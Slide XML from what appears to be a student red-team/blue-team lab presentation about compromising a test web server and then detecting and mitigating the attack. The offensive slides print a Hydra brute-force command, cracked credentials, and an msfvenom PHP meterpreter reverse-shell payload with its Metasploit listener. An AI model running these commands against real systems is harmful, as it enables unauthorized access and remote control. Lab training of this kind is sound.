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Medium"/>
      <p:regular r:id="rId33"/>
      <p:bold r:id="rId34"/>
      <p:italic r:id="rId35"/>
      <p:boldItalic r:id="rId36"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto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240006B-A813-4B23-B01B-D8AA47099E57}">
  <a:tblStyle styleId="{E240006B-A813-4B23-B01B-D8AA47099E5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44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-boldItalic.fntdata"/><Relationship Id="rId43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Medium-regular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italic.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-bold.fntdata"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-regular.fntdata"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-boldItalic.fntdata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Georell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Georell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Georell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4" name="Google Shape;1224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Tracey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Miraflor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Miraflor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Miraflor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5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9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36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3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3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4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0.png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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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68.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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84.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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3.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87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3.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100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90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7.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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2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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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12.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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7.png"/><Relationship Id="rId4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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.png"/><Relationship Id="rId5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5041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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2440650" y="3543300"/>
            <a:ext cx="426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By: Miraflor Quiroz, Jesus Martinez, Georell-Tim Cruzado, Emily Factor, and Tracey Gonzalez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Meterpreter Listener</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1135" name="Google Shape;1135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Processes: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Upon successfully implanting the PHP shell payload we then set up a meterpreter listener that allowed us to connect to the compromised host and retrieve the flag. The listener waits for a user to run the reverse shell and compromise the target. Once the “shell.php” file has been executed, the meterpreter listener allows us to navigate directories and retrieve the server data.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7" name="Google Shape;1137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8" name="Google Shape;1138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9" name="Google Shape;1139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0" name="Google Shape;1140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41" name="Google Shape;1141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2" name="Google Shape;1142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3" name="Google Shape;1143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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="2428500" cy="3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Achievements: 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Exploit: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&lt;use exploit/multi/handler&gt; &lt;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set payload php/meterpreter/reverse_tcp&gt; &lt;set LHOST 192.168.1.90&gt; &lt;exploit&gt;</a:t>
            </a:r>
            <a:endParaRPr baseline="-25000"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Output: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[*] Started reverse TCP handler on 192.168.1.90:4444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Result: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Access to the root directory and the flag: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&lt;shell&gt;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&lt;cd /&gt;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&lt;find . -iname flag.txt&gt; &lt;cat flag.txt&gt;</a:t>
            </a:r>
            <a:endParaRPr i="1"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5" name="Google Shape;1145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6" name="Google Shape;114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7" name="Google Shape;114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8" name="Google Shape;1148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9" name="Google Shape;11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578" y="3991988"/>
            <a:ext cx="1728678" cy="64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0" name="Google Shape;115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1563313"/>
            <a:ext cx="3112750" cy="22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7" name="Google Shape;1157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3" name="Google Shape;1163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4" name="Google Shape;1164;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198700" y="709325"/>
            <a:ext cx="8613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								         2022-05-19 11 pm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			      Over 280 GB of packets were sent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						   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>The large amount of packets</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>												      being sent from  ip address</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>												      192.168.1.105 is indication</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>														      of a portscan</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1165" name="Google Shape;116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00" y="8113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7600" y="1966188"/>
            <a:ext cx="6107780" cy="296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7" name="Google Shape;116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1455" y="1952475"/>
            <a:ext cx="2266138" cy="296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8100" y="31143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4" name="Google Shape;1174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66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="215000" y="719225"/>
            <a:ext cx="89376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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>t 2022-05-10 11 pm 147,279 requests made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			They requested for secret_folder located in</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>												          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>he company_folders directory</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1176" name="Google Shape;11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50" y="81306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7" name="Google Shape;1177;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="51164" l="424" r="790" t="1573"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="38100" y="1690925"/>
            <a:ext cx="8929699" cy="2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215000" y="722250"/>
            <a:ext cx="8928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			       48 hits were made to brute force the password</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:highlight>
                <a:schemeClr val="accent6"/>
              </a:highlight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 </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:highlight>
                <a:schemeClr val="accent6"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1184" name="Google Shape;1184;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4973725" y="9091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600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>The hacker made 47 requests before finding the correct password at the 48th attempt</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1185" name="Google Shape;1185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6" name="Google Shape;118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250" y="81608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7" name="Google Shape;1187;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="51504" l="1281" r="870" t="1343"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="98325" y="1694950"/>
            <a:ext cx="8947349" cy="206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3" name="Google Shape;1193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68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223750" y="664900"/>
            <a:ext cx="5791200" cy="972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539 total requests were made for the WebDAV directory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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>hell.php and passwd.dav were the files requested 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Request methods included: GET, PUT and PROFIND</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1195" name="Google Shape;119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750" y="664912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" name="Google Shape;119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625" y="2309025"/>
            <a:ext cx="2406376" cy="25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835300"/>
            <a:ext cx="8284424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2309025"/>
            <a:ext cx="6737625" cy="283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5" name="Google Shape;1205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11" name="Google Shape;1211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Create an alert on port traffic that will trigger once the threshold is reached.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 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Set threshold if any single IP address requests a low level of more than 10 port scans and severe alert for anything above 100 for abnormally high traffic.</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1213" name="Google Shape;1213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Whitelist known IPs and have the firewall block unauthorized IPs from scanning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Set Port and Host sweep filters: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7000: TCP: Port Scan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7001: UDP: Port Scan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7002: TCP: Host Sweep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7003: UDP: Host Sweep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7004: ICMP: Host Sweep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Font typeface="Roboto"/>
              <a:buChar char="○"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7016: ICMPv6: Host Sweep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The scan and sweep filters track the number of port scan and host sweep attempts from a single source IP address.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IDS like Kibana or Splunk allow alerts for port scan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>ctivity for rapid response to any potential threats.</a:t>
            </a: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9" name="Google Shape;1219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An alarm can be set for attempts made to “secret_folder” from any IP address that are not 192.168.1.105 or 192.168.1.1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Alert email  to the SOC Analyst should be sent when &gt; 0 requests are made from a single unknown IP address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1" name="Google Shape;1221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Modify to block unwanted access to the “secret_folder” from any unauthorized IP through an editor</a:t>
            </a:r>
            <a:endParaRPr/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SzPts val="800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Ex:  nano company_folders/secret_folder/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Order allow,deny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Allow from 192.168.1.105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        Deny from 192.168.1.90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Create iptables with IP destinations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Command example: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urier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Iptables -A INPUT -s 192.168.1.90 -d               192.168.1.105 -p tcp –dport 80 -j DROP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This will DROP packets from port 80 for the source port 192.168.1.90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7" name="Google Shape;1227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8" name="Google Shape;1228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An alert can be set to detect 401 errors.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threshold would be set to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>activate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> the alarm when 10 errors are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>returned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>.  </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1229" name="Google Shape;1229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 failed login attempts, lock account for 30 mins after 5 unsuccessful attempts. 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Limit logins to a whitelist of IP addresses.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Create a password policy that requires password complexity.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Configure account policies on the server to limit failed login attempts.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7" name="Google Shape;1027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9" name="Google Shape;1029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30" name="Google Shape;1030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1" name="Google Shape;1031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2" name="Google Shape;1032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3" name="Google Shape;1033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4" name="Google Shape;1034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6" name="Google Shape;1036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7" name="Google Shape;1037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9" name="Google Shape;103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40" name="Google Shape;104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1" name="Google Shape;1041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2" name="Google Shape;1042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7" name="Google Shape;1047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5" name="Google Shape;1235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a whitelist of trusted IP addresses. Then review the list every 3 to 6 months.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Set an alarm to activate on any IP address trying to access the webdev directory that is not on that list of trusted IP addresses.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Threshold would be set to activate the alarm when an HTTP PUT request is made.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7" name="Google Shape;1237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Create the whitelist of trusted IP addresses, ensure the firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t> policy prevents all other access. </a:t>
            </a:r>
            <a:endParaRPr sz="13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300"/>
              <a:t>Ensure that anyone that access the webdev folder has a complex username and password.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> 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3" name="Google Shape;1243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An alarm can be set to detect an attempting access to port 4444. The threshold for the alert will be sent out when there is any attempt to access the port.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Another </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>alarm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t> could be set up for any file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>uploads into the webdev folder. The threshold would be to send out an alert when an attempt is made to upload a file.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5" name="Google Shape;1245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Block all other IP addresses than are not on the whitelist.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Make sure only necessary ports are open. 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Set webdav folder to read only for those with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>. That will prevent anyone uploading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t> files.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3" name="Google Shape;1053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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="277300" y="7763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1" name="Google Shape;10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50" y="776375"/>
            <a:ext cx="8543925" cy="389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8" name="Google Shape;1068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9" name="Google Shape;1069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5" name="Google Shape;1075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6" name="Google Shape;1076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7" name="Google Shape;1077;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="110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{E240006B-A813-4B23-B01B-D8AA47099E57}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2782200"/>
                <a:gridCol w="2782200"/>
                <a:gridCol w="2782200"/>
              </a:tblGrid>
              <a:tr h="52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66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 of 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 server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54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collects logs from target machine.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Gateway is used as a network node that serves as an access point to another network.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3" name="Google Shape;1083;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="533688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90675" y="947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{E240006B-A813-4B23-B01B-D8AA47099E57}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2987550"/>
                <a:gridCol w="2987550"/>
                <a:gridCol w="2987550"/>
              </a:tblGrid>
              <a:tr h="440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1472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Traversal Attacks | </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="12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 Directory Traversal, we were able to gain unauthorized access to restricted directories and files.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Directory Traversal vulnerability allows an attacker to access other parts of the file system to view restricted files and gather more information required to further compromise the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2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Metasploit Payload | </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="12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 were able to find the hidden webdav directory, and with the help of metasploit we were able to deliver a reverse shell payload.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Metasploit Payload vulnerability allows the attacker to transfer data to the target. Scripts are utilized by the hacker to interact with a hacked system.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6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RFI (Remote File Inclusion) | </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="98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Critical</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="98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Lastly, we were</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr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able to execute the exploit and remotely connect to the compromised host.</a:t>
                      </a:r>
                      <a:endParaRPr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</a:t>
                      </a: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RFI vulnerability allows an attacker to successfully gain access to sensitive information, compromised servers and a site takeover that allows for content modification.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Hydra Brute Force Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1090" name="Google Shape;1090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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="14213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We ran a port scan using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&lt;nmap 192.168.1.0/24&gt;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, and by performing a “Directory Traversal Attack” we discovered that http port 80 was open. We also discovered a password protected folder under: (192.168.1.105/company_folders/secret_folder/). Using </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1100" u="sng">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hydra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we were able to brute force the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login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credentials using a “rockyou.txt” wordlist. This resulted in the successful discovery of the secret folder credentials: ashton:leopoldo.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2" name="Google Shape;1092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3" name="Google Shape;1093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4" name="Google Shape;1094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5" name="Google Shape;1095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6" name="Google Shape;1096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7" name="Google Shape;1097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8" name="Google Shape;1098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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1421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Exploit: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 &lt;hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder&gt;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Output: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[80] [http-get] host: 192.168.1.105 login: ashton password: leopoldo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Result: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Access to the (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192.168.1.105/company_folders/secret_folder/) directory.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0" name="Google Shape;1100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1" name="Google Shape;1101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2" name="Google Shape;1102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3" name="Google Shape;1103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4" name="Google Shape;110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4550" y="1531850"/>
            <a:ext cx="3219450" cy="145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5" name="Google Shape;1105;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8618275" y="2020400"/>
            <a:ext cx="109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FFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="accent2"/>
                </a:highlight>
              </a:rPr>
              <a:t>leopoldo</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="00FFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="accent2"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1106" name="Google Shape;11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550" y="3036750"/>
            <a:ext cx="3219450" cy="18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PHP Reverse Shell Payload</a:t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52775" y="14213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"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>After performing the “Hydra Brute Force Attack” we gained access to the “secret_folder.” This directory had had a hash (which decrypted into Ryan’s password: </a:t>
            </a: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linux4u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) and instructions detailing how to connect to the webdav server. Using the Kali Linux file explorer we navigated to: dav://192.168.1.105/webdav directory and set up the reverse shell payload in the webdav directory.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2137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Achievements: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Exploit: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1" lang="en" sz="1100">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&lt;msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=4444 &gt;&gt; shell.php&gt;</a:t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Output: </a:t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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Result: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The successful implantation of the .php reverse shell payload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7" name="Google Shape;11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875" y="2970721"/>
            <a:ext cx="566825" cy="6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8" name="Google Shape;112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0088" y="1422115"/>
            <a:ext cx="2810675" cy="235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100" y="3543300"/>
            <a:ext cx="2810650" cy="158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